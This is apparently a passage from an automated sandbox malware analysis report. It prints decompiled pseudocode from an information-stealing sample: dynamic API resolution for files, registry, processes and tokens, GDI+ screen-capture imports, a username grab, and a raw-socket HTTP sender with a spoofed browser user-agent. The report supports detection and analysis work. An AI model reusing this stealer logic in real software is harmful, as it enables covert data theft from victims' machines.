                                                                                                                                                                                              • Source File: 00000000.00000002.272333577.000000000184D000.00000040.00000001.sdmp, Offset: 0184D000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7f7668753e47af45a6b1809cf1dd247d186bd07808e2ac97e9ae12c485743572
                                                                                                                                                                                              • Instruction ID: 862ceb545de0298c3b984c0eb0b09473a000685f2f694b569afd7772df911502
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f7668753e47af45a6b1809cf1dd247d186bd07808e2ac97e9ae12c485743572
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C21CD76504284CFDB02CF44D9C4B16BF71FB84320F24C2A9DC044B656C33AE51ACBA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0184D3AF, Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272333577.000000000184D000.00000040.00000001.sdmp, Offset: 0184D000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 1967e1d8e991aea2e47e39e1f732321430c81ec071d3e65f4882fbb11894070a
                                                                                                                                                                                              • Instruction ID: b92680b000a96997392dcbd47171b66d11a23c01ae65fd04787cf552ed71b04d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1967e1d8e991aea2e47e39e1f732321430c81ec071d3e65f4882fbb11894070a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 02110076404284CFDB02CF54D9C4B56BF71FB94324F28C6A9D8084B657C33AE55ACBA2
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 031EDA00, Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d47b5f6c117e007d44e845b638aab3d76519147fdd8bb98290dcd4a3dab0bfa8
                                                                                                                                                                                              • Instruction ID: b376ecd1418d87be4148c39250e75e55f148e790f369dba1d8eb8f93d5e829d6
                                                                                                                                                                                              • Opcode Fuzzy Hash: d47b5f6c117e007d44e845b638aab3d76519147fdd8bb98290dcd4a3dab0bfa8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C12B4B94117668BD310EF65F99C1893BA1B747328FB0C208D2E11FAD9D7B8154ACF89
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 031EB184, Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 49d45d4192ab94d41f3061d74c116c6ea82f87d75a35d74d8f6b212b443ce044
                                                                                                                                                                                              • Instruction ID: dcf1389849e308d2db72fa2ab4b81bb9bd412b929e74654790bde2bc31fa8031
                                                                                                                                                                                              • Opcode Fuzzy Hash: 49d45d4192ab94d41f3061d74c116c6ea82f87d75a35d74d8f6b212b443ce044
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2DA17036E00A1ACFCF05DFA5D8445DDBBB2FF89304B15856AE905BB221DB32E955CB80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 031ED9F0, Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.272503279.00000000031E0000.00000040.00000001.sdmp, Offset: 031E0000, based on PE: false
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 094773fae22d5d779b0980f49daafc6ac6956618fe1327f7e8c45ef6d6220487
                                                                                                                                                                                              • Instruction ID: a915d8cee42406a237c83685c1ef1f83545f05cf00e2155356a73ce257403908
                                                                                                                                                                                              • Opcode Fuzzy Hash: 094773fae22d5d779b0980f49daafc6ac6956618fe1327f7e8c45ef6d6220487
                                                                                                                                                                                              • Instruction Fuzzy Hash: 98C11CB98117668BD711EF64F98C1897BA1BB87328F70C308D1E12B6D9D7B4144ACF88
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Analysis Process: e0YQRfcpqS.exe PID: 6564 Parent PID: 4740 e0YQRfcpqS.exeCOMMON

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 00417B1A, Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00417B1A() {
				void* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t21;

				 *0x41c890 =  *0x41c890 - 1;
				if( *0x41c890 < 0) {
					_t2 = LoadLibraryA("crtdll.dll"); // executed
					 *0x41c868 = GetProcAddress(_t2, "wcscmp");
					_t4 = LoadLibraryA("Gdiplus.dll"); // executed
					 *0x41c86c = GetProcAddress(_t4, "GdiplusStartup");
					 *0x41c870 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdiplusShutdown");
					 *0x41c874 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipCreateBitmapFromHBITMAP");
					 *0x41c878 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncodersSize");
					 *0x41c87c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncoders");
					 *0x41c880 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipDisposeImage");
					 *0x41c884 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipSaveImageToStream");
					 *0x41c888 = GetProcAddress(LoadLibraryA("ole32.dll"), "CreateStreamOnHGlobal");
					_t21 = GetProcAddress(LoadLibraryA("ole32.dll"), "GetHGlobalFromStream");
					 *0x41c88c = _t21;
					return _t21;
				}
				return _t1;
			}







                                                                                                                                                                                              0x00417b1c
                                                                                                                                                                                              0x00417b23
                                                                                                                                                                                              0x00417b33
                                                                                                                                                                                              0x00417b3e
                                                                                                                                                                                              0x00417b4d
                                                                                                                                                                                              0x00417b58
                                                                                                                                                                                              0x00417b72
                                                                                                                                                                                              0x00417b8c
                                                                                                                                                                                              0x00417ba6
                                                                                                                                                                                              0x00417bc0
                                                                                                                                                                                              0x00417bda
                                                                                                                                                                                              0x00417bf4
                                                                                                                                                                                              0x00417c0e
                                                                                                                                                                                              0x00417c23
                                                                                                                                                                                              0x00417c28
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00417c28
                                                                                                                                                                                              0x00417c2d

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 00417B33
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417B39
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B4D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B53
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B67
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B6D
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B81
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417B87
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417B9B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BA1
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 00417BB5
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BBB
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 00417BCF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BD5
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417BE9
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BEF
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 00417C03
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C09
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417C1D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C23
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                                                                                                                                                                                              • API String ID: 2574300362-2815069134
                                                                                                                                                                                              • Opcode ID: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
                                                                                                                                                                                              • Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
                                                                                                                                                                                              • Opcode Fuzzy Hash: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00418124, Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 269libraryloadernetworkCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                              			E00418124(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v432;
				intOrPtr _v444;
				short _v446;
				char _v448;
				char _v1472;
				char _v1476;
				char _v1480;
				char _v1484;
				char _v1488;
				char _v1492;
				void* _t141;
				void* _t144;
				void* _t151;
				void* _t186;
				struct HINSTANCE__* _t193;
				struct HINSTANCE__* _t196;
				void* _t197;
				intOrPtr _t206;
				void* _t222;
				void* _t225;
				void* _t228;

				_v1476 = 0;
				_v1480 = 0;
				_v1484 = 0;
				_v1488 = 0;
				_v1492 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				E00403980(_a16);
				E00403980(_a12);
				_push(_t228);
				_push(0x418535);
				_push( *[fs:eax]);
				 *[fs:eax] = _t228 + 0xfffffa30;
				E0040357C( &_v28, "wsock32.dll");
				_t196 = GetModuleHandleA(E004039E8( &_v28));
				if(_t196 == 0) {
					_t193 = LoadLibraryA(E004039E8( &_v28)); // executed
					_t196 = _t193;
				}
				 *0x41c89c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0xc]));
				 *0x41c8a0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x17]));
				 *0x41c8a4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x25]));
				 *0x41c8a8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x2c]));
				 *0x41c8ac = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x31]));
				 *0x41c8b0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x36]));
				 *0x41c8b4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x3c]));
				 *0x41c8b8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x44]));
				if(_t196 != 0 &&  *0x41c89c != 0 &&  *0x41c8a0 != 0 &&  *0x41c8a4 != 0 &&  *0x41c8a8 != 0 &&  *0x41c8ac != 0 &&  *0x41c8b0 != 0 &&  *0x41c8b4 != 0 &&  *0x41c8b8 != 0) {
					E004034E4( &_v24);
					_push( &_v432);
					_push(E00404EE4(2, 2));
					if( *0x41c89c() == 0) {
						_t141 =  *0x41c8a4(2, 1, 0); // executed
						_t225 = _t141;
						if(_t225 != 0xffffffff) {
							_v448 = 2;
							_t144 =  *0x41c8a0(E00403990(_v8)); // executed
							if(_t144 != 0) {
								_v444 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))));
								_v446 =  *0x41c8b0(_a8);
								_t151 =  *0x41c8b4(_t225,  &_v448, 0x10);
								_t243 = _t151;
								if(_t151 == 0) {
									E00403850();
									E00403D2C( &_v1480, _v1484);
									E00417D60(E00403790(_a12), _t196,  &_v1488, _t225, _t243);
									E00403D2C( &_v1492, _a12);
									E00403E1C();
									E0040377C( &_v20, _v1476);
									 *0x41c8a8(_t225, E004039E8( &_v20), E00403790(_v20), 0, _v1492, L"\r\n\r\n", _v1488, _v1480, "Content-Length: ", 0x4185d8, "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", "User-agent: ", "Connection: close\r\n", 0x4185d8, _a16, "Host: ", " HTTP/1.0\r\n", _v12, 0x4185a8, _v16);
									E004034E4( &_v24);
									do {
										E004034E4( &_v32);
										E004028E0( &_v1472, 0x400);
										_t197 =  *0x41c8ac(_t225,  &_v1472, 0x400, 0);
										E004035D4( &_v32, _t197,  &_v1472);
										E00403798( &_v24, _v32);
									} while (_t197 > 0);
									 *0x41c8b8(_t225);
									_push( &_v24);
									_push(E00403A78(0x418680, _v24) + 4);
									_t186 = E00403790(_v24);
									_pop(_t222);
									E004039F0(_v24, _t186, _t222);
									E00403538(_a4, _v24);
								}
							}
						}
					}
				}
				_pop(_t206);
				 *[fs:eax] = _t206;
				_push(E0041853C);
				E00403B98( &_v1492, 2);
				E004034E4( &_v1484);
				E00403B98( &_v1480, 2);
				E00403508( &_v32, 7);
				return E00403508( &_a12, 2);
			}































                                                                                                                                                                                              0x00418131
                                                                                                                                                                                              0x00418137
                                                                                                                                                                                              0x0041813d
                                                                                                                                                                                              0x00418143
                                                                                                                                                                                              0x00418149
                                                                                                                                                                                              0x0041814f
                                                                                                                                                                                              0x00418152
                                                                                                                                                                                              0x00418155
                                                                                                                                                                                              0x00418158
                                                                                                                                                                                              0x0041815b
                                                                                                                                                                                              0x0041815e
                                                                                                                                                                                              0x00418161
                                                                                                                                                                                              0x00418167
                                                                                                                                                                                              0x0041816f
                                                                                                                                                                                              0x00418177
                                                                                                                                                                                              0x0041817f
                                                                                                                                                                                              0x00418187
                                                                                                                                                                                              0x0041818e
                                                                                                                                                                                              0x0041818f
                                                                                                                                                                                              0x00418194
                                                                                                                                                                                              0x00418197
                                                                                                                                                                                              0x004181a2
                                                                                                                                                                                              0x004181b5
                                                                                                                                                                                              0x004181b9
                                                                                                                                                                                              0x004181c4
                                                                                                                                                                                              0x004181c9
                                                                                                                                                                                              0x004181c9
                                                                                                                                                                                              0x004181dd
                                                                                                                                                                                              0x004181f4
                                                                                                                                                                                              0x0041820b
                                                                                                                                                                                              0x00418222
                                                                                                                                                                                              0x00418239
                                                                                                                                                                                              0x00418250
                                                                                                                                                                                              0x00418267
                                                                                                                                                                                              0x0041827e
                                                                                                                                                                                              0x00418285
                                                                                                                                                                                              0x004182f6
                                                                                                                                                                                              0x00418301
                                                                                                                                                                                              0x0041830b
                                                                                                                                                                                              0x00418314
                                                                                                                                                                                              0x00418320
                                                                                                                                                                                              0x00418326
                                                                                                                                                                                              0x0041832b
                                                                                                                                                                                              0x00418331
                                                                                                                                                                                              0x00418343
                                                                                                                                                                                              0x0041834b
                                                                                                                                                                                              0x00418358
                                                                                                                                                                                              0x00418369
                                                                                                                                                                                              0x0041837a
                                                                                                                                                                                              0x00418380
                                                                                                                                                                                              0x00418382
                                                                                                                                                                                              0x004183c9
                                                                                                                                                                                              0x004183da
                                                                                                                                                                                              0x004183f3
                                                                                                                                                                                              0x0041840c
                                                                                                                                                                                              0x00418422
                                                                                                                                                                                              0x00418430
                                                                                                                                                                                              0x0041844a
                                                                                                                                                                                              0x00418453
                                                                                                                                                                                              0x00418458
                                                                                                                                                                                              0x0041845b
                                                                                                                                                                                              0x0041846d
                                                                                                                                                                                              0x00418487
                                                                                                                                                                                              0x00418494
                                                                                                                                                                                              0x0041849f
                                                                                                                                                                                              0x004184a4
                                                                                                                                                                                              0x004184a9
                                                                                                                                                                                              0x004184b2
                                                                                                                                                                                              0x004184c3
                                                                                                                                                                                              0x004184c7
                                                                                                                                                                                              0x004184d1
                                                                                                                                                                                              0x004184d2
                                                                                                                                                                                              0x004184dd
                                                                                                                                                                                              0x004184dd
                                                                                                                                                                                              0x00418382
                                                                                                                                                                                              0x0041834b
                                                                                                                                                                                              0x0041832b
                                                                                                                                                                                              0x00418314
                                                                                                                                                                                              0x004184e4
                                                                                                                                                                                              0x004184e7
                                                                                                                                                                                              0x004184ea
                                                                                                                                                                                              0x004184fa
                                                                                                                                                                                              0x00418505
                                                                                                                                                                                              0x00418515
                                                                                                                                                                                              0x00418522
                                                                                                                                                                                              0x00418534

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC), ref: 004181C4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004181D8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000017), ref: 004181EF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000025), ref: 00418206
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000002C), ref: 0041821D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000031), ref: 00418234
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000036), ref: 0041824B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00418262
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000044), ref: 00418279
                                                                                                                                                                                              • WSAStartup.WS2_32(00000000,?), ref: 0041830C
                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 00418320
                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 00418343
                                                                                                                                                                                              • htons.WS2_32(00000000), ref: 00418363
                                                                                                                                                                                              • connect.WS2_32(00000000,00000002,00000010), ref: 0041837A
                                                                                                                                                                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 0041844A
                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 004184A9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModuleStartupclosesocketconnectgethostbynamehtonssendsocket
                                                                                                                                                                                              • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
                                                                                                                                                                                              • API String ID: 4159890453-3355491746
                                                                                                                                                                                              • Opcode ID: cc7a5bd10b09796705fbf6bc02ce29ddddcaf4dda09e662a85e1bab2a4bbd459
                                                                                                                                                                                              • Instruction ID: acd65350bdfe250b2cabb462dd412f1b2f53023e341749034ab9d15be0839763
                                                                                                                                                                                              • Opcode Fuzzy Hash: cc7a5bd10b09796705fbf6bc02ce29ddddcaf4dda09e662a85e1bab2a4bbd459
                                                                                                                                                                                              • Instruction Fuzzy Hash: 85B1DFB1940219AFDB11EF65CC86BDF7BB8EF44306F50407BF504B2291DB789A458E58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004065CC, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E004065CC(void* __eax) {
				short _v516;
				int _t7;
				void* _t12;
				DWORD* _t15;

				_t15 =  &_v516;
				_t12 = __eax;
				 *_t15 = 0xff;
				_t7 = GetUserNameW( &_v516, _t15); // executed
				if(_t7 == 0) {
					return E00403B80(_t12);
				}
				return E00403D10(_t12, 0x100,  &_v516);
			}







                                                                                                                                                                                              0x004065cd
                                                                                                                                                                                              0x004065d3
                                                                                                                                                                                              0x004065d5
                                                                                                                                                                                              0x004065e9
                                                                                                                                                                                              0x004065ed
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00406603
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                                              • Opcode ID: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                                                                                                                                                                                              • Instruction ID: 82fb6e080fc5b909ee9ff94d6b2e2f71dc3c30d6621c9439b15b03eb027989ab
                                                                                                                                                                                              • Opcode Fuzzy Hash: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 10E086712042025BD310EB58DC81A9A76D89B84315F00483EBC45D73D2EE3DDE589756
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040561C, Relevance: 220.8, APIs: 63, Strings: 63, Instructions: 312libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0040561C() {
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t112;
				struct HINSTANCE__* _t114;
				struct HINSTANCE__* _t116;
				struct HINSTANCE__* _t117;
				struct HINSTANCE__* _t120;
				_Unknown_base(*)()* _t121;

				 *0x41c678 = LoadLibraryA("kernel32.dll");
				 *0x41c67c = GetProcAddress( *0x41c678, "ExpandEnvironmentStringsW");
				 *0x41c680 = GetProcAddress( *0x41c678, "GetComputerNameW");
				 *0x41c684 = GetProcAddress( *0x41c678, "GlobalMemoryStatus");
				 *0x41c688 = GetProcAddress( *0x41c678, "CreateFileW");
				 *0x41c68c = GetProcAddress( *0x41c678, "GetFileSize");
				 *0x41c690 = GetProcAddress( *0x41c678, "CloseHandle");
				 *0x41c694 = GetProcAddress( *0x41c678, "ReadFile");
				 *0x41c698 = GetProcAddress( *0x41c678, "GetFileAttributesW");
				 *0x41c69c = GetProcAddress( *0x41c678, "CreateMutexA");
				 *0x41c6a0 = GetProcAddress( *0x41c678, "ReleaseMutex");
				 *0x41c6a4 = GetProcAddress( *0x41c678, "GetLastError");
				 *0x41c6a8 = GetProcAddress( *0x41c678, "GetCurrentDirectoryW");
				 *0x41c6ac = GetProcAddress( *0x41c678, "SetEnvironmentVariableW");
				 *0x41c6b0 = GetProcAddress( *0x41c678, "GetEnvironmentVariableW");
				 *0x41c6b4 = GetProcAddress( *0x41c678, "SetCurrentDirectoryW");
				 *0x41c6b8 = GetProcAddress( *0x41c678, "FindFirstFileW");
				 *0x41c6bc = GetProcAddress( *0x41c678, "FindNextFileW");
				 *0x41c6c0 = GetProcAddress( *0x41c678, "LocalFree");
				 *0x41c6c4 = GetProcAddress( *0x41c678, "GetTickCount");
				 *0x41c6c8 = GetProcAddress( *0x41c678, "CopyFileW");
				 *0x41c6cc = GetProcAddress( *0x41c678, "FindClose");
				 *0x41c6d0 = GetProcAddress( *0x41c678, "GlobalMemoryStatusEx");
				 *0x41c6d4 = GetProcAddress( *0x41c678, "CreateToolhelp32Snapshot");
				 *0x41c6d8 = GetProcAddress( *0x41c678, "Process32FirstW");
				 *0x41c6dc = GetProcAddress( *0x41c678, "Process32NextW");
				 *0x41c6e0 = GetProcAddress( *0x41c678, "GetModuleFileNameW");
				 *0x41c6e4 = GetProcAddress( *0x41c678, "SetDllDirectoryW");
				 *0x41c6e8 = GetProcAddress( *0x41c678, "GetLocaleInfoA");
				 *0x41c6ec = GetProcAddress( *0x41c678, "GetLocalTime");
				 *0x41c6f0 = GetProcAddress( *0x41c678, "GetTimeZoneInformation");
				 *0x41c6f4 = GetProcAddress( *0x41c678, "RemoveDirectoryW");
				 *0x41c6f8 = GetProcAddress( *0x41c678, "DeleteFileW");
				 *0x41c6fc = GetProcAddress( *0x41c678, "GetLogicalDriveStringsA");
				 *0x41c700 = GetProcAddress( *0x41c678, "GetDriveTypeA");
				 *0x41c704 = GetProcAddress( *0x41c678, "CreateProcessW");
				 *0x41c708 = LoadLibraryA("advapi32.dll");
				 *0x41c70c = GetProcAddress( *0x41c708, "GetUserNameW");
				 *0x41c710 = GetProcAddress( *0x41c708, "RegCreateKeyExW");
				 *0x41c714 = GetProcAddress( *0x41c708, "RegQueryValueExW");
				 *0x41c718 = GetProcAddress( *0x41c708, "RegCloseKey");
				 *0x41c71c = GetProcAddress( *0x41c708, "RegOpenKeyExW");
				 *0x41c720 = GetProcAddress( *0x41c708, "AllocateAndInitializeSid");
				 *0x41c724 = GetProcAddress( *0x41c708, "LookupAccountSidA");
				 *0x41c728 = GetProcAddress( *0x41c708, "CreateProcessAsUserW");
				 *0x41c72c = GetProcAddress( *0x41c708, "CheckTokenMembership");
				 *0x41c730 = GetProcAddress( *0x41c708, "RegOpenKeyW");
				 *0x41c734 = GetProcAddress( *0x41c708, "RegEnumKeyW");
				 *0x41c738 = GetProcAddress( *0x41c708, "RegEnumValueW");
